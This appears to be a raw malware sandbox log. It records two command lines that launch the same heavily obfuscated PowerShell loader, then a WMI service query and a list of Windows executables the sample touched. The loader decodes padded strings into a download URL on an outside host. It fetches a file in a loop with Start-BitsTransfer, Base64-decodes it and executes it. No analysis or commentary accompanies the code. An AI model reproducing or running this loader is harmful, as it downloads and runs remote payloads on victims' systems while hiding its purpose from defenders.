cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Cintereye9 ([string]$Abdiceri){For($Knack=4; $Knack -lt $Abdiceri.Length-1; $Knack+=(4+1)){$Arbejdsa18=$Abdiceri.substring( $Knack, 1);$Iongitr+=$Arbejdsa18};$Iongitr;}$Medi=Cintereye9 'MetahUncrtRookt astp GarsRkke:Taha/Chem/ Trnwsesaw LewwProt.Cabrt Oprashapr Kraaferrm DrfuupthlRelaaChanlEffebPreri NonnLsepesammlLiomo somr stu.Orotr Diso Lav/ TrnR skueCanin stet GejeNsketUdhoeMarsrKragm Bli.KommoProtc TraxRese ';$Iongitr01=Cintereye9 ' skaistore MasxYaup ';$Rush = Cintereye9 ' Rei\EkspsChecy Beks AptwJanio BumwOver6Anim4Draw\ sciW BruipilenMilldBlgeoKortwOrm sEddiPGantoNovew skie UncrUforssnightankeTigglreselObvi\kandv spe1Drot. sve0Rari\ genpsvagoInvow sameMusirTryksRapthRelieMacrlsuctlKere. Rese svixAcaceKost ';.($Iongitr01) (Cintereye9 'Inex$ViriG Liti skab svibrundeBlaasIntevUfo i Unwg Udt2 Hel= Coc$Lykke sannBlyiv Gre: ForwOveriNotanfritdNeohiHalvr Gre ') ;.($Iongitr01) (Cintereye9 'Mega$FrimRDateuRvresMalkhXylo=Capr$HenrG sikiInhibHoveb LimeBefisPlanv Kami knugChon2Genk+ Elf$BuddRDopiuColusTraih Eas ') ;.($Iongitr01) (Cintereye9 'Cerv$FrerMPrepaCackt stjeDiskr Ran aff=Mous Omva( Buf(CompgFarvw tramDekai Fes saccwExtri sinnDiak3 spn2snow_ OekpWorlrPindoCarecpleneRetas Opps Fri Tilv- satFDish MagP UnfrVirto Rgfc Lene JagsIrids malIHonndIndb= Aga$ Uro{vensPFolkIBesiD Roc}Halv)Edel. LgsCAureoTandm UtrmDigta Regn Ford LevLsyntiUdsknCaraeGylt) Pre Brin-genisRingpMatel AfsiunpetUdre Twin[ Urncserih Lovasupprbrig] Qui3Vers4 Che ');.($Iongitr01) (Cintereye9 'Anti$ salE WrikMaans Rako Cac Nasu=Enhe Alle$EpalM GalaThintCocte folrReko[Zaff$RelaM Rala Ulit Tokeskulr Rom. 
denc Rego ImpuCascnUnfit Bac- Til2 Met]Unad ');.($Iongitr01) (Cintereye9 ' slu$AbhoTAnaleAntir Impr WriaBgenpGeraispecn XissTrde=Circ( BruTNepheBlthsFjertHolo-GribP Bara UdgtBenshOmri Pre$OverR Maeu snrsMacrhOver) swi Eru- staAInten NondAarv data(Anat[ PasIBibbnPowdt KapP Prot Kryrsher] For:subu: FlosHooyi Arbz syne Und Udsl-Gadee BalqNarr Rich8Mary) Mar ') ;if ($Terrapins) {.$Rush $Ekso;} else {;$Iongitr00=Cintereye9 ' Lans Rost Bloastopr BuntEsco-KontB numisupet RidsEkstTPlagr FeaaAbstnForvssubsfUndeestenrFrem reun-GamisNuveoCadiuultrrFogmc ConeComp Pseu$DuopMUnphesultdZiggiNaal Brot-MellDBasaesigjs InctPediiEmannRefoaUnpet TiniUnslo PapnDamp schi$ PapG svii KalbinklbAntie Meas stov MediMiligBard2 Flu ';.($Iongitr01) (Cintereye9 'Ubes$skygGHagei Hoybbrinb TwieKlicsLifevInteistifg Hep2 Nit=Udbr$ stieOximn Gumv Rep: telaHibipFluopsenidstraa BudtReopasyno ') ;.($Iongitr01) (Cintereye9 'TilbIMissmforepsniro Tryr GlitImpl-OverM UsloLiggdClimuAlmilOldee Tol methBBdepiGarvtgrelsPlumTsipir thwaDescn RetsHibefsamee HekrEksp ') ;$Gibbesvig2=$Gibbesvig2+'\Fractiong.stu';while (-not $Preternat) {.($Iongitr01) (Cintereye9 ' Rat$ unaPInsurOveredomitNatteManorBritnPolia smetPred= Bes( BarTEnqueKlunssheetGift- skrP disa CantDaarhTors skos$ InfGFintiIleibBerib Uroe Ides scav MariArsegGram2Turb)Livs ') ;.($Iongitr01) $Iongitr00;.($Iongitr01) (Cintereye9 ' ekss BeftslagaCharr scrtKoge-HockskloalKhaneDumpe RespPela Mask5 Udg ');}.($Iongitr01) (Cintereye9 'Deca$ AtoC Pagi LatnTweetBerleRenhr CuteFasayKoageAngl Eric=Pent DjvG Pere smrtMeek-OverCImpro Benn HydtNarre AlunTekst Til Legi$OdioGungdiVanfbBrunb ExheMarmsArtiv GloiRipog Til2 Dru ');.($Iongitr01) (Cintereye9 ' For$FinaR RygePuntn InwlPhotiAfluv brn Reti=Anti Ger[Tasassociy shosstartnecressttm Alo.PameC ProoRenhn Monv ManesubirRefothund] Bal:Noti:TrawF ReprAlaro ChomPatsB spoa DgnsEnaleBill6 Pen4DannssupetLderr Fori Unin WeigKnip(Bese$storC Fori Eskn Palt Fise sekr Peresugey octeUnde) Cam ');.($Iongitr01) (Cintereye9 ' 
Ufr$tunfIGullo InvnspergPrefiRevit ConrIntr2 rel Ansk= Rot Annu[scopsFuguy FensKulitEctoe CremRetr.ArseT MaseHypoxrefottaun. KonE nonnsalvc TraoOverdKiloiskiln AftgArch] Coc:Fjer:DoctA Ters PreCCronIKautI sno.NonaGHyste sodtVaris kuktAfmarDataiskspn Colg Cla(supe$stilR supeCaudn Gull LyniDivavskol) Ben ');.($Iongitr01) (Cintereye9 'Rink$ sogVImmuiKjerc Besk Unissmreb Banusnyd= Gra$KonsI Urgo svenOutcgProvismokt Yakr mea2Frds.Rects MenuHebrb BogsRentt IndrInveiRappnAbstg Fas(Radi2 Ove1Dors3Glem4 Lat8slet1 Pre,strk2Wall8 ble0Opgi0surf8Lage) Ord ');.($Iongitr01) $Vicksbu;}"
cmdline powershell "Function Cintereye9 ([string]$Abdiceri){For($Knack=4; $Knack -lt $Abdiceri.Length-1; $Knack+=(4+1)){$Arbejdsa18=$Abdiceri.substring( $Knack, 1);$Iongitr+=$Arbejdsa18};$Iongitr;}$Medi=Cintereye9 'MetahUncrtRookt astp GarsRkke:Taha/Chem/ Trnwsesaw LewwProt.Cabrt Oprashapr Kraaferrm DrfuupthlRelaaChanlEffebPreri NonnLsepesammlLiomo somr stu.Orotr Diso Lav/ TrnR skueCanin stet GejeNsketUdhoeMarsrKragm Bli.KommoProtc TraxRese ';$Iongitr01=Cintereye9 ' skaistore MasxYaup ';$Rush = Cintereye9 ' Rei\EkspsChecy Beks AptwJanio BumwOver6Anim4Draw\ sciW BruipilenMilldBlgeoKortwOrm sEddiPGantoNovew skie UncrUforssnightankeTigglreselObvi\kandv spe1Drot. sve0Rari\ genpsvagoInvow sameMusirTryksRapthRelieMacrlsuctlKere. Rese svixAcaceKost ';.($Iongitr01) (Cintereye9 'Inex$ViriG Liti skab svibrundeBlaasIntevUfo i Unwg Udt2 Hel= Coc$Lykke sannBlyiv Gre: ForwOveriNotanfritdNeohiHalvr Gre ') ;.($Iongitr01) (Cintereye9 'Mega$FrimRDateuRvresMalkhXylo=Capr$HenrG sikiInhibHoveb LimeBefisPlanv Kami knugChon2Genk+ Elf$BuddRDopiuColusTraih Eas ') ;.($Iongitr01) (Cintereye9 'Cerv$FrerMPrepaCackt stjeDiskr Ran aff=Mous Omva( Buf(CompgFarvw tramDekai Fes saccwExtri sinnDiak3 spn2snow_ OekpWorlrPindoCarecpleneRetas Opps Fri Tilv- satFDish MagP UnfrVirto Rgfc Lene JagsIrids malIHonndIndb= Aga$ Uro{vensPFolkIBesiD Roc}Halv)Edel. LgsCAureoTandm UtrmDigta Regn Ford LevLsyntiUdsknCaraeGylt) Pre Brin-genisRingpMatel AfsiunpetUdre Twin[ Urncserih Lovasupprbrig] Qui3Vers4 Che ');.($Iongitr01) (Cintereye9 'Anti$ salE WrikMaans Rako Cac Nasu=Enhe Alle$EpalM GalaThintCocte folrReko[Zaff$RelaM Rala Ulit Tokeskulr Rom. 
denc Rego ImpuCascnUnfit Bac- Til2 Met]Unad ');.($Iongitr01) (Cintereye9 ' slu$AbhoTAnaleAntir Impr WriaBgenpGeraispecn XissTrde=Circ( BruTNepheBlthsFjertHolo-GribP Bara UdgtBenshOmri Pre$OverR Maeu snrsMacrhOver) swi Eru- staAInten NondAarv data(Anat[ PasIBibbnPowdt KapP Prot Kryrsher] For:subu: FlosHooyi Arbz syne Und Udsl-Gadee BalqNarr Rich8Mary) Mar ') ;if ($Terrapins) {.$Rush $Ekso;} else {;$Iongitr00=Cintereye9 ' Lans Rost Bloastopr BuntEsco-KontB numisupet RidsEkstTPlagr FeaaAbstnForvssubsfUndeestenrFrem reun-GamisNuveoCadiuultrrFogmc ConeComp Pseu$DuopMUnphesultdZiggiNaal Brot-MellDBasaesigjs InctPediiEmannRefoaUnpet TiniUnslo PapnDamp schi$ PapG svii KalbinklbAntie Meas stov MediMiligBard2 Flu ';.($Iongitr01) (Cintereye9 'Ubes$skygGHagei Hoybbrinb TwieKlicsLifevInteistifg Hep2 Nit=Udbr$ stieOximn Gumv Rep: telaHibipFluopsenidstraa BudtReopasyno ') ;.($Iongitr01) (Cintereye9 'TilbIMissmforepsniro Tryr GlitImpl-OverM UsloLiggdClimuAlmilOldee Tol methBBdepiGarvtgrelsPlumTsipir thwaDescn RetsHibefsamee HekrEksp ') ;$Gibbesvig2=$Gibbesvig2+'\Fractiong.stu';while (-not $Preternat) {.($Iongitr01) (Cintereye9 ' Rat$ unaPInsurOveredomitNatteManorBritnPolia smetPred= Bes( BarTEnqueKlunssheetGift- skrP disa CantDaarhTors skos$ InfGFintiIleibBerib Uroe Ides scav MariArsegGram2Turb)Livs ') ;.($Iongitr01) $Iongitr00;.($Iongitr01) (Cintereye9 ' ekss BeftslagaCharr scrtKoge-HockskloalKhaneDumpe RespPela Mask5 Udg ');}.($Iongitr01) (Cintereye9 'Deca$ AtoC Pagi LatnTweetBerleRenhr CuteFasayKoageAngl Eric=Pent DjvG Pere smrtMeek-OverCImpro Benn HydtNarre AlunTekst Til Legi$OdioGungdiVanfbBrunb ExheMarmsArtiv GloiRipog Til2 Dru ');.($Iongitr01) (Cintereye9 ' For$FinaR RygePuntn InwlPhotiAfluv brn Reti=Anti Ger[Tasassociy shosstartnecressttm Alo.PameC ProoRenhn Monv ManesubirRefothund] Bal:Noti:TrawF ReprAlaro ChomPatsB spoa DgnsEnaleBill6 Pen4DannssupetLderr Fori Unin WeigKnip(Bese$storC Fori Eskn Palt Fise sekr Peresugey octeUnde) Cam ');.($Iongitr01) (Cintereye9 ' 
Ufr$tunfIGullo InvnspergPrefiRevit ConrIntr2 rel Ansk= Rot Annu[scopsFuguy FensKulitEctoe CremRetr.ArseT MaseHypoxrefottaun. KonE nonnsalvc TraoOverdKiloiskiln AftgArch] Coc:Fjer:DoctA Ters PreCCronIKautI sno.NonaGHyste sodtVaris kuktAfmarDataiskspn Colg Cla(supe$stilR supeCaudn Gull LyniDivavskol) Ben ');.($Iongitr01) (Cintereye9 'Rink$ sogVImmuiKjerc Besk Unissmreb Banusnyd= Gra$KonsI Urgo svenOutcgProvismokt Yakr mea2Frds.Rects MenuHebrb BogsRentt IndrInveiRappnAbstg Fas(Radi2 Ove1Dors3Glem4 Lat8slet1 Pre,strk2Wall8 ble0Opgi0surf8Lage) Ord ');.($Iongitr01) $Vicksbu;}"
wmi Select * from Win32_Service
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe